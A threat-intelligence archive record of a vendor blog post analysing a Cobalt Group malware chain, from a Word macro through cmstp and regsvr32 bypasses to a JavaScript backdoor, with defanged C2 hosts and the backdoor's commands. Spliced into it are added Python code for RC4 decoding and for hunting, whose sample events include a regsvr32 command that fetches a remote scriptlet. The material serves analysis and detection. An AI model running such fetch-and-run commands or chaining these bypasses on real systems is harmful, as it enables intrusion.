{
	"id": "a22a0770-dd0d-4e5e-8bb6-dd4e044da524",
	"created_at": "2026-04-06T00:21:40.778177Z",
	"updated_at": "2026-04-10T13:11:46.935407Z",
	"deleted_at": null,
	"sha1_hash": "dbd5ff3e11a32a611fc64efc4e3378585c9536fa",
	"title": "Cobalt Group 2.0",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3372380,
	"plain_text": "Cobalt Group 2.0\r\nBy Michael Gorelik\r\nArchived: 2026-04-05 12:49:48 UTC\r\nOver the past year, Morphisec and several other endpoint protection companies have been tracking a resurgence in activity from the Cobalt Group. Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. The most recent attacks can be grouped into two types of campaigns. Many of the campaigns are based on the known and prevalent ThreadKit exploit kit generation framework. Other campaigns are more sophisticated, borrowing only some functionality from the ThreadKit builder while incorporating additional advanced techniques from other sources.\r\nMorphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructure used by both APT28 (aka Fancy Bear) and MuddyWater.\r\nOne of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to a JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication and the attribution patterns.\r\nCobalt Group Technical Details\r\nStage 1 – Word Macro + Whitelisting Bypass\r\nAs with many other campaigns, the victim received a document with malicious Visual Basic macro code. Although the code is heavily obfuscated, the entry point is easily identifiable. 
The VB code is executed starting from the Frame1_Layout function; this trigger is used much less frequently than the obvious Document_Open or AutoOpen.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 1 of 11\n\nThe list of additional possible execution triggers is defined here: https://www.greyhathacker.net/?p=948\r\nThe macro executes the legitimate Windows process cmstp.exe (Connection Manager Profile Installer). This technique was previously used by the MuddyWater group when attacking Middle East targets. The use of cmstp.exe as a whitelisting bypass was researched by Oddvar Moe, who showed how, by manipulating the INF file, cmstp can execute scriptlets or executables.\r\nIn our case the attacker abused cmstp to execute a JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. This way the group limited the exposure and the delivery of the JavaScript to relevant targets only.\r\nStage 2 – JavaScript Dropper + Whitelisting Bypass\r\nThe JavaScript is encoded with RC4 plus some custom modifications.\r\nThe decrypted JavaScript has some functionality similar to the ThreadKit builder, which is heavily used by Cobalt Gang 1.0.\r\nAs can be seen from the deobfuscated code, the JavaScript yet again bypasses whitelisting by abusing regsvr32.exe, another legitimate Windows process. The two dropped artifacts – a payload DLL and a Word document – are written to the “Users\\\u003cLog on User\u003e” folder (the document replaces the opened malicious document with a clean stub after killing the running Word process).\r\nStage 3 – PureBasic Legitimate Executable Mixed with Additional Malicious Functions\r\nThe dropped DLL is actually PureBasic compiled code and a legitimate application. 
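Before going into the DLL, the RC4 layer mentioned under stage 2 is worth seeing as code. The block below is an added example, not code from the post or from the sample: it implements textbook RC4 (the post says the sample adds custom modifications on top of RC4 but does not describe them, so they are not reproduced), encodes a small constructed scriptlet with a made-up key, decodes it again and pulls the JScript body out of the CDATA section the way an analyst would when peeling this stage.

```python
# Added example (not from the original post): plain RC4 over a scriptlet.
# The real sample's key and its custom tweaks to RC4 are not on the page,
# so the key and the scriptlet below are constructed for demonstration.

def rc4_ksa(key: bytes) -> list:
    '''Key-scheduling algorithm: permute 0..255 under the key.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s

def rc4_crypt(key: bytes, data: bytes) -> bytes:
    '''PRGA keystream XORed with the data. RC4 is symmetric, so the same
    call both encrypts and decrypts.'''
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

KEY = b'cobalt-demo-key'  # constructed; the sample's real key is not on the page

Q = chr(34)  # double-quote character, assembled at runtime to keep the literal simple
# Constructed minimal scriptlet of the kind cmstp/regsvr32 can run.
SAMPLE_SCRIPTLET = '\r\n'.join([
    '<?XML version=' + Q + '1.0' + Q + '?>',
    '<scriptlet>',
    '<registration progid=' + Q + 'Demo' + Q + '>',
    '<script language=' + Q + 'JScript' + Q + '><![CDATA[',
    'var sh = new ActiveXObject(' + Q + 'WScript.Shell' + Q + ');',
    ']]></script>',
    '</registration>',
    '</scriptlet>',
])

def encode_stage(key: bytes, scriptlet: str) -> str:
    '''Produce the hex-encoded RC4 blob a loader would embed.'''
    return rc4_crypt(key, scriptlet.encode('utf-8')).hex()

def decode_stage(key: bytes, blob_hex: str) -> str:
    '''Reverse of encode_stage: hex -> RC4 -> UTF-8 scriptlet text.'''
    return rc4_crypt(key, bytes.fromhex(blob_hex)).decode('utf-8')

def extract_script_body(scriptlet: str) -> str:
    '''Return the JScript between the CDATA markers, or an empty string
    when the decoded text is not a scriptlet (wrong key, wrong layer).'''
    start = scriptlet.find('<![CDATA[')
    end = scriptlet.find(']]>', start)
    if start < 0 or end < 0:
        return ''
    return scriptlet[start + len('<![CDATA['):end].strip()

if __name__ == '__main__':
    blob = encode_stage(KEY, SAMPLE_SCRIPTLET)
    print(extract_script_body(decode_stage(KEY, blob)))
```

A practical check when applying this to a real blob: if the decoded bytes do not start with printable XML, the key or the custom pre-processing is wrong, and extract_script_body returning an empty string is the signal to look for that extra layer rather than to trust the output.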
The application is not signed (like many other PureBasic applications) and is therefore easily manipulated to execute inserted malicious code. In this case, the exported function DllRegisterServer was not part of the legitimate application and is a perfect hook for redirecting the application flow when the DLL is executed by regsvr32.exe. Because PureBasic is a full programming language that compiles to assembly and offers endless possibilities and APIs to manipulate memory, it also complicates the generation of patterns by security vendors that base their detection on static or dynamic pattern signatures. Some security solutions block all PureBasic programs outright (a wrong move, since there are plenty of legitimate PureBasic programs in use today), but from the attacker group’s point of view the choice of PureBasic is a smart one.\r\nTo function properly, the malicious injected code needs to reflectively resolve and map the core functions it depends on. The same code also applies anti-disassembly and anti-debugging techniques. It resolves a set of functions from Kernel32 and Advapi32.\r\nThe code then uses the resolved functions to add persistence through the registry and to record the file names of the next stages in the following locations:\r\nHKCU\\Environment\\UserInitMprLogonScript – the next-stage command (the JavaScript downloader executed through regsvr32) is registered under UserInitMprLogonScript.\r\nHKCU\\Software\\Microsoft\\Notepad\\\u003c$UserName$\u003e – the code creates a new value under the Notepad key holding a randomly generated pair of names. 
The right side of the pair is the name of the JavaScript in the next stage (stage 4), while the left side of the pair is the name of the file that will be downloaded as part of stage 5.\r\nSuch a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks.\r\nAs the last execution step of the DLL, the malicious code writes a JavaScript scriptlet into the Roaming directory and then calls CreateProcess on regsvr32 with the command line stored in UserInitMprLogonScript.\r\nStage 4 – JavaScript Downloader + Whitelisting Bypass\r\nHere, the scriptlet is automatically obfuscated in a way similar to the first scriptlet.\r\nAfter quick deobfuscation, we get a clear JavaScript that tries to download the next-stage JavaScript backdoor using the same regsvr32. Note that the name of the JavaScript is part of the Notepad registry value that was written in the previous stage.\r\nThe script also validates that no one changed the randomly assigned name of the executing file from the previous stage. If the name of the executing JavaScript does not match the name registered in the Notepad registry value, the script will not run (researchers sometimes rename the files to execute the different stages separately; that will not work in this case).\r\nThis decoded JavaScript downloader is almost identical to a downloader previously seen around one year ago: https://twitter.com/ItsReallyNick/status/914894320766943232\r\nStage 5 – JavaScript Backdoor\r\nThe last-stage JavaScript is downloaded from hxxps://server.vestacp[.]kz/robots.txt.\r\nThe JavaScript is obfuscated the same way as in the previous stages. 
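Before turning to the decoded backdoor, the stage 1 to 4 artifacts above (cmstp.exe installing an INF from an Office macro, regsvr32.exe running a remote scriptlet or a DLL dropped in the user profile, the UserInitMprLogonScript value and the extra value under the Notepad key) are exactly what a defender would hunt for in endpoint telemetry. The block below is an added example, not code from the post or from the sample: it runs those checks over constructed events shaped roughly like Sysmon process-creation and registry-value-set records. The field names, paths, user name and the example.invalid URL are placeholders; the regsvr32 /i:... scrobj.dll command form is the usual way a scriptlet is executed through regsvr32 and is an assumption, since the post does not quote the exact command lines.

```python
# Added example (not from the original post): hunting logic for the
# living-off-the-land chain described above, over constructed events.
# Field layout, paths and names are assumptions modelled on the post.

LOGON_SCRIPT_KEY = 'HKCU\\Environment'
LOGON_SCRIPT_VALUE = 'UserInitMprLogonScript'
NOTEPAD_KEY = 'HKCU\\Software\\Microsoft\\Notepad'
# Values Notepad itself writes under its key; any other name is suspect.
KNOWN_NOTEPAD_VALUES = {
    'iPointSize', 'fWrap', 'StatusBar', 'fSaveWindowPositions',
    'iWindowPosX', 'iWindowPosY', 'iWindowPosDX', 'iWindowPosDY',
    'lfFaceName', 'lfPitchAndFamily', 'lfQuality', 'lfClipPrecision',
    'lfOutPrecision', 'lfCharSet', 'lfStrikeOut', 'lfUnderline',
    'lfItalic', 'lfWeight', 'lfOrientation', 'lfEscapement',
    'szHeader', 'szTrailer', 'iMarginTop', 'iMarginBottom',
    'iMarginLeft', 'iMarginRight', 'fMLE_is_broken',
}
OFFICE_PARENTS = ('winword.exe', 'excel.exe', 'powerpnt.exe')

def basename(path: str) -> str:
    '''Lower-cased file name of a Windows path.'''
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()

def check_process(ev: dict) -> list:
    '''Findings for one process-creation event (stages 1, 2 and 4).'''
    image = basename(ev.get('image', ''))
    parent = basename(ev.get('parent_image', ''))
    cmd = ev.get('command_line', '')
    low = cmd.lower()
    findings = []
    # cmstp.exe installing a connection-manager profile is rare enough on
    # workstations that every INF invocation is worth a look.
    if image == 'cmstp.exe' and '.inf' in low:
        findings.append('cmstp.exe installing a profile from an INF: ' + cmd)
    if image == 'regsvr32.exe' and 'scrobj.dll' in low and '/i:http' in low:
        findings.append('regsvr32.exe fetching a remote scriptlet: ' + cmd)
    if image == 'regsvr32.exe' and '\\users\\' in low and '.dll' in low:
        findings.append('regsvr32.exe registering a DLL from a user profile: ' + cmd)
    if image in ('cmstp.exe', 'regsvr32.exe') and parent in OFFICE_PARENTS:
        findings.append(parent + ' spawned ' + image + ' (macro-driven LOLBin)')
    return findings

def check_registry(ev: dict) -> list:
    '''Findings for one registry value-set event (stage 3 persistence).
    Assumes the HKU\\<SID> prefix was already normalised to HKCU upstream.'''
    key = ev.get('key', '').lower()
    name = ev.get('value_name', '')
    data = str(ev.get('data', ''))
    findings = []
    if key == LOGON_SCRIPT_KEY.lower() and name.lower() == LOGON_SCRIPT_VALUE.lower():
        findings.append('logon-script persistence via UserInitMprLogonScript: ' + data)
    if key == NOTEPAD_KEY.lower() and name not in KNOWN_NOTEPAD_VALUES:
        findings.append('unexpected value ' + name + ' under the Notepad key: ' + data)
    return findings

def hunt(events: list) -> list:
    '''Run every check; returns (event index, finding) pairs so that a hit
    can be traced back to the record that produced it.'''
    hits = []
    for idx, ev in enumerate(events):
        if ev.get('type') == 'process':
            found = check_process(ev)
        elif ev.get('type') == 'registry':
            found = check_registry(ev)
        else:
            found = []
        for finding in found:
            hits.append((idx, finding))
    return hits

SAMPLE_EVENTS = [  # constructed; nothing here is an indicator from the sample
    {'type': 'process', 'image': 'C:\\Windows\\System32\\cmstp.exe',
     'parent_image': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE',
     'command_line': 'cmstp.exe /s /ni C:\\Users\\alice\\AppData\\Local\\Temp\\profile.inf'},
    {'type': 'process', 'image': 'C:\\Windows\\System32\\regsvr32.exe',
     'parent_image': 'C:\\Windows\\System32\\cmstp.exe',
     'command_line': 'regsvr32.exe /s /n /u /i:https://example.invalid/stage2.sct scrobj.dll'},
    {'type': 'process', 'image': 'C:\\Windows\\System32\\regsvr32.exe',
     'parent_image': 'C:\\Windows\\System32\\wscript.exe',
     'command_line': 'regsvr32.exe /s C:\\Users\\alice\\payload.dll'},
    {'type': 'registry', 'key': 'HKCU\\Environment', 'value_name': 'UserInitMprLogonScript',
     'data': 'regsvr32 /s /n /u /i:C:\\Users\\alice\\AppData\\Roaming\\dl.txt scrobj.dll'},
    {'type': 'registry', 'key': 'HKCU\\Software\\Microsoft\\Notepad',
     'value_name': 'alice', 'data': 'x7q2p9:k3m8w1'},
    {'type': 'registry', 'key': 'HKCU\\Software\\Microsoft\\Notepad',
     'value_name': 'iWindowPosX', 'data': '100'},  # benign Notepad setting
    {'type': 'process', 'image': 'C:\\Windows\\System32\\regsvr32.exe',
     'parent_image': 'C:\\Windows\\System32\\msiexec.exe',
     'command_line': 'regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll'},  # benign
]

if __name__ == '__main__':
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(idx, finding)
```

The two benign records at the end are there on purpose: a Notepad setting written by Notepad and a vendor DLL registered from Program Files produce no hits, which is the property to preserve when tuning the Notepad allowlist or the user-profile path check for a real estate.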
After deobfuscation, we encounter a backdoor that was used in attacks against Russian-speaking businesses in August 2017. The command protocol of this backdoor is almost identical to the previously described backdoor, aside from some name changes:\r\n“d\u0026exec” – download an executable or a DLL (if it is a DLL, use regsvr32 to execute it)\r\n“more_eggs” – download a new backdoor script and replace the existing one with it\r\n“gtfo” – clean traces, remove persistence and the stage 4 and 5 files\r\n“more_onion” – execute the backdoor script\r\n“via_x” – execute cmd / shell commands locally\r\nWith every communication with the C2, the script collects and sends information about the target environment, including which security solutions from a hard-coded list are installed on the computer.\r\nArtifacts\r\nhttps://github.com/smgorelik/Meetups/blob/master/09272018_Meetup.7z\r\nConclusion\r\nAs organizations improve their defenses, attackers find new ways to get around them. Threat groups such as Cobalt are increasingly incorporating delivery techniques that allow them to easily bypass whitelisting and AppLocker policies, and we see more and more attacks using legitimate processes to carry out their malicious intent.\r\nAlthough some of the decrypted artifacts have been seen in the wild since the beginning of the year (or earlier), the attack is still very effective, as many security solutions do not detect the artifacts once they are obfuscated and encrypted. The need for a different approach to security is greater than ever. Moving Target Defense, as defined by the DHS and implemented by Morphisec, breaks the assumptions made by the attackers. 
The Morphisec Preemptive Cyber Defense Platform natively prevents the attack before it can perform any type of malicious activity, no updates needed.\r\nOrganizations should expect to see much more coming from all Cobalt Group factions during the next year. Contact one of our security experts to learn how Morphisec protects your business from this and future Cobalt attacks.\r\nAbout the author\r\nMichael Gorelik\r\nChief Technology Officer\r\nMorphisec CTO Michael Gorelik leads the malware research operation and sets technology strategy. He has extensive experience in the software industry and in leading diverse cybersecurity software development projects. Prior to Morphisec, Michael was VP of R\u0026D at MotionLogic GmbH, and previously served in senior leadership positions at Deutsche Telekom Labs. Michael has extensive experience as a red teamer, reverse engineer, and contributor to the MITRE CVE database. He has worked extensively with the FBI and US Department of Homeland Security on countering global cybercrime. Michael is a noted speaker, having presented at multiple industry conferences, such as SANS, BSides, and RSA. Michael holds BSc and MSc degrees from the Computer Science department at Ben-Gurion University, focusing on synchronization in different OS architectures. He also jointly holds seven patents in the IT space.\r\nSource: https://blog.morphisec.com/cobalt-gang-2.0",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.morphisec.com/cobalt-gang-2.0"
	],
	"report_names": [
		"cobalt-gang-2.0"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "220e1e99-97ab-440a-8027-b672c5c5df44",
			"created_at": "2022-10-25T16:47:55.773407Z",
			"updated_at": "2026-04-10T02:00:03.649501Z",
			"deleted_at": null,
			"main_name": "GOLD KINGSWOOD",
			"aliases": [
				"Cobalt Gang ",
				"Cobalt Spider "
			],
			"source_name": "Secureworks:GOLD KINGSWOOD",
			"tools": [
				"ATMSpitter",
				"Buhtrap",
				"Carbanak",
				"Cobalt Strike",
				"CobtInt",
				"Cyst",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"SpicyOmelette"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434900,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.pdf",
		"text": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.txt",
		"img": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.jpg"
	}
}